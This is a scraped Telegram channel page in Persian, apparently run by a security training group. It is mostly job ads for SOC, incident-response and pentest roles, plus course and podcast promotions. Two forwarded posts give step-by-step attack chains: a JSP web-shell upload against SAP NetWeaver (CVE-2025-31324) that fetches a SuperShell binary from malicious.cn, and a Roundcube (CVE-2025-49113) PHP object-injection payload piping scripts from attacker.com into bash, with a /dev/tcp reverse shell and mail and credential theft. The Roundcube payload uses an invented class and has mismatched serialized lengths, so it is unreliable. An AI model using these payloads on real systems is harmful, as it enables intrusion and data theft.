TG Telegram Group Link
Channel: فرصت‌های شغلی شبکه و امنیت
Back to Bottom
@LianJob   |   Jump To Your Office
☺️ فرصت همکاری کارشناس لایه یک مرکز عملیات امنیت
☺️ وزارت تعاون، کار و رفاه اجتماعی

◀️ وظایف:
☺️بررسی، تحلیل و گزارش رخدادهای امنیتی
☺️مستندسازی و گزارش‌نویسی
☺️استفاده از داشبوردها جهت تحلیل رخدادهای امنیتی و ارائه گزارش‌های کارآمد

◀️ شرایط احراز:
☺️حداقل یکسال سابقه کاری مرتبط
☺️دارای مدرک کارشناسی مهندسی کامپیوتر / IT
☺️آشنایی با انواع حملات در لایه‌های مختلف شبکه
☺️آشنایی با محصولات امنیتی مانند فایروال‌ها، IPS/IDS
☺️آشنایی با ابزارهای تحلیل لاگ مانند Splunk ,ELK
☺️آشنایی با سرفصل‌های LPIC-1 ، آشنایی با سیستم‌عامل‌های ویندوز و لینوکس، آشنایی با دوره‌هایی مانند SANS 501, SANS 504, SANS 450

☺️ارسال رزومه به:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
⬅️ میزگردهای Safe Cast
⬅️ با موضوع بررسی امنیت سایبری از سه زاویه فنی، مدیریتی و قانونی
⬅️ با حضور: پویان زمانی، وحید علمی و رضا الفت

🔗 لینک مشاهده در یوتیوب:
https://youtu.be/BTN4G622zZA

🔗 لینک مشاهده در آپارات:
https://www.aparat.com/v/kbk79k9

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 🔫🔫🔫🔫 🔫🔫🔫🔫🔫
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
☺️ فرصت همکاری کارشناس پاسخگویی به حوادث
☺️ وزارت تعاون، کار و رفاه اجتماعی

◀️ وظایف:
☺️پیگیری تیکت های صادر شده توسط مرکز عملیات امنیت تا بسته شدن
☺️مدیریت فرآیندهای مهار، ریشهیابی و بازیابی در برابر حملات امنیتی (Incident Handling)
☺️استفاده از ابزارهای SIEM برای تشخیص و تحلیل حملات امنیتی و تدوین سناریوهای مرتبط
☺️شناسایی و ارائه راهکارهای مناسب برای Misconfiguration ها و حملات سایبری در سطح شبکه
☺️بررسی اشکالات و نقص های امنیتی وب سایت ها ، سامانه ها و اپلیکیشن های سازمان

◀️ شرایط احراز:
☺️داشتن مدرک حداقل کارشناسی فناوری اطلاعات / کامپیوتر
☺️آشنایی با محصولای امنیتی مثل فایروال، DLP, IPS/IDS و ...
☺️آشنایی با انواع حملات سایبری و روش های مقابله با آن (وب سایت ها و سرور ها و ...)
☺️آشنایی با نرم افزار های SIEM نظیر ELK , Splunk آشنایی با تحلیل Log ها و بررسی Log های دستگاه ها
☺️آشنایی با دستگاه های فایروال و WAF ، IDS/IPS آشنایی با گزارشات و بررسی آنتی ویروس ها
☺️آشنایی با انواع مختلف شبک هها و حملات وابسته به و ب
☺️نظارت بر Security Incidents دریافت شده توسط SIEM آشنایی با با ابزار های ی نظیر Nessus ، Rapid7

☺️ارسال رزومه به:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
☺️ فرصت همکاری کارشناس مدیریت امنیت اطلاعات
☺️ وزارت تعاون، کار و رفاه اجتماعی

◀️ وظایف:
☺️جمع آوری اطلاعات دارایی های امنیت
☺️بکارگیری نرم افزارهای ITSM
☺️آشنایی با پیاده سازی استانداردهای امنیت
☺️راهبری سیستم های هوش تهدید

◀️ شرایط احراز:
☺️داشتن مدرک حداقل کارشناسی فناوری اطلاعات / کامپیوتر
☺️آشنا با سیستم های مدیریت امنیت اطلاعات
☺️آشنا با سیستم های هوش تهدید
☺️منظم ، صبور ، پیگیر

☺️ارسال رزومه به:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
☺️ فرصت همکاری در چند موقعیت شغلی مختلف
☺️ شرکت مدیریت و راهبری زیرساخت صاد (وابسته به بانک صادرات)

◀️ موقعیت‌های شغلی:
☺️کارشناس ارشد/ کارشناس امنیت شبکه
☺️تحلیلگرمرکز عملیات امنیت (سطح 1 و 2)
☺️کارشناس تست نفوذ و آسیب پذیری (Web, App, Mobile)
☺️کارشناس ارشد/ کارشناس ISMS
☺️کارشناس مرکز مانیتورینگ

☺️ارسال رزومه به:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
👈 انتشار ویدئوهای کلاس شبیه‌سازی حملات MITRE ATT&CK (با محوریت Purple Team)
👈 مدرس دوره: مهندس کوشا زنجانی

📺 مشاهده و دانلود دوره:
☺️ https://liangroup.net/academy/pentest-course/MITRE-Attack

این دوره در ایام نوروز سال 1401 در آکادمی لیان به تدریس مهندس زنجانی برگزار شد و طی ده قسمت، تمام ویدئوهای این دوره منتشر خواهد شد.

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 🔫🔫🔫🔫 🔫🔫🔫🔫🔫
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
🛍 آخر هفته‌های لیان

☄️ قراره تو آخر هفته‌های لیان، تخفیفات مختلف روی یه سری دوره‌ها بزاریم. این تخفیف‌ها از همین الان شروع میشن تا ساعت 18 روز جمعه هم ادامه دارن. تخفیف‌ها از 20 تا 60درصد هستن.

🍎 برای مشاهده جزئیات بیشتر و دیدن دوره‌های تخفیف خورده به لینک زیر مراجعه کنید:
🔗 https://liangroup.net/academy/lian-weekend

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 🔫🔫🔫🔫 🔫🔫🔫🔫🔫
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
☺️ فرصت همکاری تحلیل‌گر امنیتی برای مرکز عملیات امنیت (SOC)
☺️ شرکت شبکه الکترونیک پرداخت کارت (شاپرک)

◀️ مهارت‌ها و مسئولیت‌های مورد نیاز:
☺️بررسی و حل مسائل حوادث امنیتی بر اساس رویدادها و روال های تعیین شده.
☺️ نظارت و تجزیه و تحلیل رویدادها و هشدارهای امنیتی تولید شده توسط ابزارها و سیستم‌های امنیتی.
☺️ارائه پشتیبانی در لایه اول برای حوادث امنیتی و همکاری با سایر اعضای تیم SOC برای حل مسئله.
☺️مشارکت در فعالیت‌های پاسخ به حوادث امنیتی، از جمله شناسایی و کنترل نفوذهای امنیتی، حفظ شواهد و انجام تجزیه و تحلیل کارآمد.
☺️کمک به توسعه، پیاده‌سازی و حفظ سیاست‌ها، رویه‌ها و کنترل‌های امنیتی.
☺️حفظ دانش به‌روز در مورد تهدیدات امنیتی، ضعف‌ها و به روش های فضای سایبری
☺️داشتن مدرک کارشناسی در رشته علوم کامپیوتر، فناوری اطلاعات یا رشته مرتبط.
☺️داشتن دانش پایه در مورد فناوری‌های امنیتی مانند دیواره آتش، سیستم‌های جلوگیری و تشخیص نفوذ، نرم‌افزار ضد ویروس و ابزارهای SIEM
☺️ آشنایی پایه ای با چارچوب‌های امنیتی مانند NIST، ISO و CIS
☺️داشتن مهارت تحلیلی و حل مسئله قوی.
☺️داشتن مهارت‌های ارتباطی و بین فردی عالی.
☺️توانایی کار در محیط با فشار بالا و در شرایط سریع و پویا.
☺️تجربه کار در صنعت بانکی و پرداخت امتیاز وِیژه محسوب می شود
☺️داشتن گواهینامه‌های مرتبط مانند CompTIA Security +، SANS GIAC یا Certified Ethical Hacker (CEH) می‌تواند امتیاز ویژه محسوب شود.

☺️ارسال رزومه:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
@LianJob   |   Jump To Your Office
@LianJob   |   Jump To Your Office
Forwarded from Cyber Warfar
گروه مرتبطی با چین با اسم Chaya_004 از آسیب‌پذیری بحرانی CVE-2025-31324 تو SAP NetWeaver سوءاستفاده کرده‌. این آسیب‌پذیری تو ماژول Visual Composer و به طور خاص تو سرویس MetadataUploader با مسیر /developmentserver/metadatauploader قرار داره. این سرویس قراره فایل متادیتا رو برای توسعه‌دهنده‌ها آپلود کنه. اما SAP یه اشتباه مرگبار کرده: این endpoint بدون هیچ نوع authentication بازه!
این endpoint به راحتی فایل‌ رو با متد POST دریافت و روی سیستم ذخیره می‌کنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود می‌کنه و روی سرور اجرا می‌کنه!

👈 یعنی چی؟ یعنی:
POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary

--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--

👈 بعدش فقط کافیه بری:
http://target-victim.com/VCService/shell.jsp?cmd=whoami

و تمام! کد روی سرور اجرا می‌شه.

🔹 مرحله دوم: پیاده‌سازی دقیق - Exploit Chain
👈 گام 1: Uploading JSP Web Shell
curl -X POST http://victim.com/developmentserver/metadatauploader \
-F "[email protected]" -H "Content-Type: multipart/form-data"

محتوای shell.jsp:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
out.println(line);
}
%>

👈 گام 2: اجرای کد از راه دور
curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"


🔹 مرحله سوم: Persistence با SuperShell
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبک‌تر و stealthتره.
👈 ویژگی‌های جالب SuperShell:
⬅️ یک. Cross-platform (Linux/Windows)
⬅️ دو. TLS encrypted reverse shell
⬅️ سه. فایل single-binary، قابل بارگذاری از طریق همین RCE
⬅️ چهار. با قابلیت اجرای دستور، TTY interactive، فایل آپلود و دانلود
👈 شِل رو چطوری نصب کردن؟
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود می‌کنه:
<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>


🔹 زیرساخت و C2 Network
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفته‌ست:
⬅️ یک. Recon: ابزارهایی مثل ARL و Pocassist برای پیدا کردن سیستم‌های SAP آسیب‌پذیر
⬅️ دو. Exploit: استفاده از CVE-2025-31324 با اسکریپت curl/python
⬅️ سه. Payload: بارگذاری SuperShell via .jsp
⬅️ چهار. C2: Tunnel کردن ترافیک از طریق SoftEther VPN و NPS (یه reverse proxy چینی)
⬅️ پنج. Persistence: ابزارهایی مثل Go Simple Tunnel یا Cobalt Strike برای backdoorهای پایدار
⬅️ شش. Evade: رمزنگاری ارتباط، تغییر مسیر DNS، و فایل‌های اسمی نامفهوم مثل ssonkfrd.jsp

🔹 تحلیل نهایی: چرا این حمله خاصه؟
⬅️ یک. Zero Auth RCE روی یک ERP حیاتی مثل SAP یعنی نفوذ به قلب سازمان.
⬅️ دو. حمله کاملاً قابل اتوماسیون با ابزارهای PoC آماده‌ست.
⬅️ سه. Golang payloads مثل SuperShell باعث میشن آنتی‌ویروس‌ها گیج بشن؛ چون فایل باینری ناشناخته‌ست.
⬅️ چهار. استفاده از ابزارهای open-source و چینی باعث میشه شناسایی APT سخت‌تر بشه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
#شروع_قطعی
☄️ دوره Windows Malware Development
👈 شروع دوره: پنجشنبه، 25 اردیبهشت 1404
👈 با تدریس: جناب مهندس بهاروندی

☺️ مشاهده جزئیات دوره و خرید:
https://liangroup.net/academy/red-teaming/Windows-Malware-Development

💠 ارائه مدرک معتبر در انتهای دوره
💠 ارائه فیلم‌های رکورد شده هر جلسه
💠 مشاوره رایگان

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻
گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
🟢 ویدئو وبینار رایگان Behind the Hash: Inside Mimikatz
🟢 با ارائه مهندس رسول بهاروندی

⬅️ قسمت اول:
https://youtu.be/59rSbyFsKZg

⬅️ قسمت دوم:
https://youtu.be/XRAa4eKv5vw

⬅️ دوره WinMalX مرتبط به این وبینار با تدریس مهندس بهاروندی:
https://liangroup.net/academy/red-teaming/Windows-Malware-Development

💠 ارائه مدرک معتبر در انتهای دوره
💠 ارائه فیلم‌های رکورد شده هر جلسه
💠 مشاوره رایگان

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻
گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
اپیزود 85 رادیو امنیت - پگاسوس و دنیای تاریک جاسوسی
LianGroup.net
#پادکست
🎤 اپیزود 85 رادیو امنیت - پگاسوس و دنیای تاریک جاسوسی - سی‌ام اردیبهشت 1404

💠 موضوعات این قسمت:
00:14 مقدمه
02:28 هک پنل مدیریتی باج‌افزار LockBit و افشای جزئیات داخلی
11:28 جریمه 530 میلیون یورویی تیک‌تاک به دلیل نقض GDPR
16:43 انتشار بدافزار Noodlophile توسط تولیدکننده‌های جعلی ویدئوی هوش مصنوعی
29:00 سواستفاده از آسیب‌پذیری زیرودی MDaemon توسط گروه APT28
40:54 جریمه 168میلیون یورویی گروه NSO (سازنده بدافزار پگاسوس)
50:37 انتشار نسخه چهارم OtterCookie با قابلیت‌های جدید

⬅️ لینک CastBox
https://lian.ac/BrZ

⬅️ مشاهده ایپزودهای قبلی:
https://liangroup.net/home/podcast

تغییرات زیادی از این قسمت تو برنامه رادیو امنیت (سیف‌کست) بوجود اومده. منتظر نقطه نظرات شما هستیم.

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
رادیو امنیت اپیزود 86 - هکر مصنوعی؛ شکارگر کرنل
LianGroup.net
#پادکست
🎤 اپیزود 86 رادیو امنیت - هکر مصنوعی؛ شکارگر کرنل - هفتم خرداد 1404

💠 موضوعات این قسمت:
00:14 مقدمه
04:36 آسیب‌پذیری بحرانی‌ در Windows Server 2025
15:51 کمپین جدید و پیشرفته‌ی بدافزاری
29:13 کمپین جاسوسی APT28 علیه زیرساخت‌های حیاتی در اروپا و آمریکا
42:20 هکر مصنوعی؛ شکارگر کرنل

⬅️ لینک CastBox
https://lian.ac/VWJ

⬅️ مطالعه بیشتر:
https://liangroup.net/blog/microsoft-outlook-cve-2023-23397/

⬅️ مشاهده ایپزودهای قبلی:
https://liangroup.net/home/podcast

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
کارشناس تست نفوذ موبایل
ما در داتین به‌دنبال همکاری با توانایی برقراری ارتباط موثر هستیم تا در نقش کارشناس تست نفوذ موبایل امور امنیت و تداوم کسب و کار ما را همراهی کند. کارشناس تست نفوذ موبایل در داتین با پذیرفتن مسوولیت‌های زیر به پیش‌برد اهداف تیم کمک می‌کند:
به عنوان متخصص تست نفوذ موبایل، شما مسئول شناسایی و ارزیابی آسیب‌پذیری‌ها و مشکلات امنیتی در اپلیکیشن‌های موبایل، به ویژه اپلیکیشن‌های اندروید، خواهید بود. شما باید توانایی تحلیل و شبیه‌سازی حملات مختلف را برای شناسایی آسیب‌پذیری‌ها و خطرات احتمالی داشته باشید. هدف اصلی شما بهبود امنیت و اطمینان از ایمنی داده‌های کاربران در برابر تهدیدات مختلف است.
برای انجام بهتر این وظایف دانش و مهارت‌های زیر نیاز است:
بررسی و ارزیابی امنیت اپلیکیشن‌های موبایل در برابر حملات مختلف.
تهیه گزارش‌های مفصل در مورد یافته‌ها و پیشنهادات اصلاحی برای تیم‌های توسعه.
همکاری نزدیک با تیم‌های توسعه برای اصلاح آسیب‌پذیری‌ها و مشکلات امنیتی.
همکاران ما در این موقعیت شغلی لازم است آشنایی با ابزارهای تست نفوذ موبایل مانند Burp Suite، Frida، Drozer و دیگر ابزارهای مشابه.
تسلط بر سیستم‌عامل اندروید و نحوه عملکرد آن.
آشنایی با تکنیک‌های رمزنگاری و امنیت داده‌ها در موبایل.
تجربه با ابزارهای تحلیل معکوس (Reverse Engineering) مانند jadx و apktool.
توانایی شبیه‌سازی و شناسایی آسیب‌پذیری‌های مختلف موبایلی و تدوین گزارشات دقیق.
تسلط به زبان‌های برنامه‌نویسی مرتبط با اندروید مانند Java، Kotlin و یا اسکریپت‌نویسی در پایتون یا Bash.
توانایی انجام تست‌های امنیتی در محیط‌های مختلف (تست روی دستگاه‌های فیزیکی، شبیه‌سازی‌ها و محیط‌های مجازی)
نکات حائز اهمیت:
تسلط بر تست نفوذ اپلیکیشن‌های iOS و آشنایی با چالش‌های امنیتی مخصوص این سیستم‌عامل مزیت محسوب می‌شود.
تسلط بر چارچوب‌های امنیتی مانند OWASP Mobile Security Testing Guide MSTG.

شرایط احراز شغل
سن: تا 32 سال
جنسیت: تفاوتی ندارد
نرم افزارها:
Kotlin متوسط
Java متوسط
Python متوسط
ShellScript متوسط


ارسال رزومه به:
[email protected]

@LianJob   |   Jump To Your Office
☄️ حضور گروه لیان
👈 در 28مین نمایشگاه بین‌المللی الکامپ

⬅️ همراه با تخفیفات ویژه 60 تا 70درصدی!!!
⬅️ محل دائمی نمایشگاه‌های بین‌المللی تهران
⬅️ سالن 6، غرفه 18-6

💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
☺️ فرصت همکاری کارشناس ارشد تیم آبی/بنفش
☺️ بانک تجارت

◀️ مهارت‌ها و مسئولیت‌های مورد نیاز:
☺️توانایی تجزیه و تحلیل حوادث امنیتی و توانایی نوشتن playbook برای حملات مختلف
☺️تجربه کاری با مانیتورینگ امنیت، تشخیص حوادث، روش‌ها و ابزارهای تحلیل حملات
☺️دارای مهارت‌های مستندسازی و گزارش‌نویسی

◀️ کارشناس تیم قرمز
☺️آشنایی با فرآیند تیم قرمز
☺️توانایی پیاده سازی حملات مربوط به اکتیو دایرکتوری
☺️تجربه کاری در حوزه شبیه سازی MITRE ATT&CK TTP
☺️داشتن سابقه کار در حوزه ردتیم، تست نفوذ

☺️ارسال رزومه:
[email protected]

@LianJob   |   Jump To Your Office
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Warfar
تحلیل آسیب‌پذیری CVE-2025-49113
🧊 یه آسیب‌پذیری بحرانی تو Roundcube Webmailاه که به هکرها بعد از احراز هویت امکان اجرای کد از راه دور (RCE) روی سرور رو می‌ده. تو ادامه جزئیات اون رو بررسی می‌کنیم.

🔹 هدف:
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حساب‌های کاربری معتبر و دسترسی از طریق اینترنت است.

🔹 مرحله 1: شناسایی هدف
👈ابزار: nmap, httpx, whatweb, wappalyzer, dirsearch.
👈خروجی:
$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]

$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">


🔹 مرحله 2: دستیابی به حساب کاربری
از اونجایی که آسیب‌پذیری بعد از احراز هویت عمل می‌کنه، نیاز به یه حساب داریم:
⬅️ یک. Credential stuffing با پسوردهای لو رفته
⬅️ دو. Social engineering برای گرفتن دسترسی کاربر
⬅️ سه. استفاده از credential leak سازمانی
Username: [email protected]
Password: Company2023!

👈 ورود موفق از طریق /roundcube/?_task=login

🔹 مرحله 3: بهره‌برداری از CVE-2025-49113
👈 فایل upload.php تو مسیر:
/program/actions/settings/upload.php

پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize می‌شه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا می‌کنیم.

🔹 مرحله 4: ساخت payload PHP Object Injection
👈 سناریو: Roundcube از لایبرری‌هایی مثل PEAR یا Symfony بهره می‌گیره، و خیلی از کلاس‌های اون قابلیت magic method مثل __destruct()، __wakeup() یا __toString() دارن.
class Exploit {
public $cmd;

function __destruct() {
system($this->cmd);
}
}

$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);

👈 مثال خروجی:
O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}


🔹 مرحله 5: ارسال درخواست مخرب
POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID

Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...

------XYZ
Content-Disposition: form-data; name="_from"

O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain

(fake content)
------XYZ--


🔹 مرحله 6: Reverse Shell
👈 فایل rev.sh محتوای زیرو داره:
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1

👈 تو سمت مهاجم:
nc -lvnp 4444


🔹 مرحله 7: Post Exploitation
⬅️ کارهایی که حالا می‌شه انجام داد:
⬅️ سرقت فایل‌های ایمیل کاربرا از /var/lib/roundcube/
⬅️ خوندن فایل‌های پیکربندی حاوی DB creds (config/config.inc.php)
⬅️ پیوت به سیستم‌عامل با privilege escalation
⬅️ نصب backdoor دائمی

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
HTML Embed Code:
2025/06/29 12:20:03
Back to Top